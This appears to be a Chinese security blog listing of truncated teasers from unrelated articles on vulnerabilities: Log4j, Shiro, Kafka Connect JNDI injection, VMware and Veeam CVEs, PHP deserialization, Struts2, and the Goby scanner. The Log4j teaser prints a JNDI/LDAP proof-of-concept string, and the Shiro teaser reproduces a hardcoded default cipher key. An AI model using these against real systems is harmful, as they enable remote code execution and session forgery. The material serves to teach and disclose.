近日，谷歌发布了年度零日漏洞报告，展示了2022年的野外漏洞统计数据，并强调了Android平台中长期存在的问题，该问题在很长一段时间内提高了已披露漏洞的价值和使用。更具体地说，谷歌的报告强调了安卓系统中的"N-days"问题，该问题源于安卓生态系统的复杂性，涉及上游供应商（谷歌）和下游制造商（手机制造商）之间的多个环节。致使不同设备型号之间的安全更新时间存在重大差异，即对于威胁行为者来说，"N-days"就是"0-days"。“0-day漏洞”（又称零日漏洞），通常就是指还没有补丁的安全漏洞，也就是已经被少数人发现的，但还没被传播开来，官方还未修复的漏洞。 当“0-day漏洞”被发现并公开后

近日，安全狗应急响应中心关注到VMware官方发布安全公告，披露出在VMwareAriaOperationsNetworks6.x系列版本中存在安全漏洞(CVE-2023-20887),具有网络访问权限的攻击者利用该漏洞通过执行命令注入攻击，从而导致远程代码执行。漏洞描述VMwareAriaOperationsforNetworks(以前称为vRealizeNetworkInsight，vRNI)是一款网络可视性和分析工具，可以帮助管理员优化网络性能或管理和扩展各种VMware和Kubernetes部署。VMwareAriaOperationsforNetworks6.x中修复了一个反序列化漏

1.Shiro1.7.1默认密钥publicCookieRememberMeManagerrememberMeManager(){CookieRememberMeManagercookieRememberMeManager=newCookieRememberMeManager();cookieRememberMeManager.setCookie(rememberMeCookie());cookieRememberMeManager.setCipherKey(Base64.decode("fCq+/xW488hMTCD+cmJ3aQ=="));returncookieRememberMeMan

漏洞原理 ApacheKafkaConnect中存在JNDI注入漏洞，当攻击者可访问KafkaConnectWorker，且可以创建或修改连接器时，通过设置sasl.jaas.config属性为com.sun.security.auth.module.JndiLoginModule，进而可导致JNDI注入，造成RCE需低版本JDK或目标KafkaConnect系统中存在利用链。 通过AivenAPI或KafkaConnectRESTAPI配置连接器时，攻击者可以为连接器设置database.history.producer.sasl.jaas.config连接器属性io.debezium.co

0x00前言本文以CVE-2023-27532为例，介绍VeeamBackup&Replication漏洞调试环境的搭建方法。0x01简介本文将要介绍以下内容：环境搭建调试环境搭建数据库凭据提取CVE-2023-27532简要分析0x02环境搭建1.软件安装安装文档：https://helpcenter.veeam.com/archive/backup/110/vsphere/install_vbr.html软件下载地址：https://www.veeam.com/download-version.htmlLicense申请地址：https://www.veeam.com/smb-vmware

目录1、漏洞原理2、序列化（以PHP语言为例）3、反序列化4、PHP魔法函数（1）__wakeup()（2）__destruct()（3）__construct()（4）__toString()（5）__get()（6）__call()1、漏洞原理PHP反序列化漏洞也叫PHP对象注入，形成的原因是程序未对用户输入的序列化字符串进行检测，导致攻击者可以控制反序列化过程，从而导致代码执行、文件操作、执行数据库操作等参数不可控。反序列化攻击在Java、Python等面向对象语言中均存在。序列化是广泛存在于PHP、Java等编程语言中的一种将有结构的对象/数组转化为无结构的字符串并储存信息的一种技术。

log4j漏洞最早出现在2021年11月24日一位阿里安全团队的员工发现的，上报到Apache之后，12月10日凌晨才被公开。该漏洞威胁等级较高。基本比肩与阿里当年的fastjson漏洞。漏洞地址：1.漏洞原理：Log4j是一种流行的Java日志记录工具,其升级版本Log4j2存在安全漏洞。这个漏洞是由Log4j2的lookup功能引起的,该功能允许开发者使用某些协议读取环境配置。但是在实现这个功能时,未对输入进行严格检查,导致出现了安全漏洞。poc:${jndi:ldap://192.168.1.x:5678/test}以上就是一个简单的log4漏洞利用的poc，这里我们主要需要了解的就是这

目录一、介绍：二、特性：三、准备：3.1、简介： 3.2、权限配置：3.2.1、Windows用户3.2.2、MacOS用户四、Goby下载：4.1、官网：五、使用：六、功能： 6.1、扫描6.2、资产收集6.2.1、获取更多资产信息：6.3、漏洞利用6.4、生成报告6.5、扩展程序一、介绍：（自动化方式）针对一个目标企业梳理最全的攻击面信息，同时能进行高效、实战化漏洞扫描，并快速的从一个验证入口点，切换到横向。二、特性：实战性：关注真正用于实际攻击的漏洞数量，以及漏洞的利用深度（不关注漏洞库的数量）体系性：打通渗透前，渗透中，以及渗透后的完整流程完整DOM事件收集，自动化触发。高效性：利用积

目录一、介绍：二、特性：三、准备：3.1、简介： 3.2、权限配置：3.2.1、Windows用户3.2.2、MacOS用户四、Goby下载：4.1、官网：五、使用：六、功能： 6.1、扫描6.2、资产收集6.2.1、获取更多资产信息：6.3、漏洞利用6.4、生成报告6.5、扩展程序一、介绍：（自动化方式）针对一个目标企业梳理最全的攻击面信息，同时能进行高效、实战化漏洞扫描，并快速的从一个验证入口点，切换到横向。二、特性：实战性：关注真正用于实际攻击的漏洞数量，以及漏洞的利用深度（不关注漏洞库的数量）体系性：打通渗透前，渗透中，以及渗透后的完整流程完整DOM事件收集，自动化触发。高效性：利用积

Struts2漏洞集合总结了一部分Strtus2漏洞，虽然现在这部分的漏洞很少了，但也是学习的一部分，收集的并不全面，后续会做补充。漏洞环境搭建可以使用在线的Vulfocus，或者使用docker部署S2-001（CVE-2007-4556）该漏洞因为用户提交表单数据并且验证失败时，后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析，然后重新填充到对应的表单数据中。例如注册或登录页面，提交失败后端一般会默认返回之前提交的数据，由于后端使用%{value}对提交的数据执行了一次OGNL表达式解析，所以可以直接构造Payload进行命令执行影响版本Struts2.0.0–Str